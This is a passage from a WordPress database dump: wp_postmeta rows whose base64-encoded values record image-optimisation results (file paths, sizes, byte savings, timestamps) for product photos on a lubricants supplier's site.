cL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwNSwidGltZSI6MTQ4MzU3NjcwNCwiaWQiOjEwODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMDE5LCJ0aW1lIjoxNDgzNTc2NzA3LCJpZCI6MTA4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDc3LCJ0aW1lIjoxNDgzNTc2NzExLCJpZCI6MTA4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NTMwLCJ0aW1lIjoxNDgzNTc2NzE0LCJpZCI6MTA4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NjAzLCJ0aW1lIjoxNDgzNTc2NzE4LCJpZCI6MTA4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6Njg1LCJ0aW1lIjoxNDgzNTc2NzIxLCJpZCI6MTA4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODM5LCJ0aW1lIjoxNDgzNTc2NzI1LCJpZCI6MTA4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6OTU2LCJ0aW1lIjoxNDgzNTc2NzI4LCJpZCI6MTA4MH1d'); 
INSERT INTO `wp_postmeta` VALUES (29776, 1079, 'wpfc_optimisation_reduction', '11225'); 
INSERT INTO `wp_postmeta` VALUES (29777, 1079, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS5qcGciLCJ3aWR0aCI6NTc2MCwiaGVpZ2h0IjozODQwLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc2NzMzLCJpZCI6IjEwNzkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NDg0LCJ0aW1lIjoxNDgzNTc2NzM3LCJpZCI6MTA3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjg1NSwidGltZSI6MTQ4MzU3Njc0MSwiaWQiOjEwNzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjo4NDcsInRpbWUiOjE0ODM1NzY3NDUsImlkIjoxMDc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozMzE3LCJ0aW1lIjoxNDgzNTc2NzUwLCJpZCI6MTA3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQ4MywidGltZSI6MTQ4MzU3Njc1MywiaWQiOjEwNzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjozOTIsInRpbWUiOjE0ODM1NzY3NTcsImlkIjoxMDc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDM1LCJ0aW1lIjoxNDgzNTc2NzYwLCJpZCI6MTA3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjc3MiwidGltZSI6MTQ4MzU3Njc2NCwiaWQiOjEwNzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ2NCwidGltZSI6MTQ4MzU3Njc2NywiaWQiOjEwNzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQ4MSwidGltZSI6MTQ4MzU3Njc3MCwiaWQiOjEwNzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ4NywidGltZSI6MTQ4MzU3Njc3NCwiaWQiOjEwNzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU4OSwidGltZSI6MTQ4MzU3Njc3OCwiaWQiOjEwNzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjcwNiwidGltZSI6MTQ4MzU3Njc4MSwiaWQiOjEwNzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdG03LWdyZWFzZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10bTctZ3JlYXNlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRtNy1ncmVhc2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjkxMywidGltZSI6MTQ4MzU3Njc4NSwiaWQiOjEwNzl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29778, 1078, 'wpfc_optimisation_reduction', '27116'); 
INSERT INTO `wp_postmeta` VALUES (29779, 1078, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLmpwZyIsIndpZHRoIjo0MDYyLCJoZWlnaHQiOjIyODUsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzY3OTAsImlkIjoiMTA3OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMzQxLCJ0aW1lIjoxNDgzNTc2NzkzLCJpZCI6MTA3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tODAweDQ1MC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQ1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tODAweDQ1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tODAweDQ1MC5qcGciLCJyZWR1Y3Rpb24iOjI5NzEsInRpbWUiOjE0ODM1NzY3OTgsImlkIjoxMDc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi03Njh4NDMyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NDMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi03Njh4NDMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIi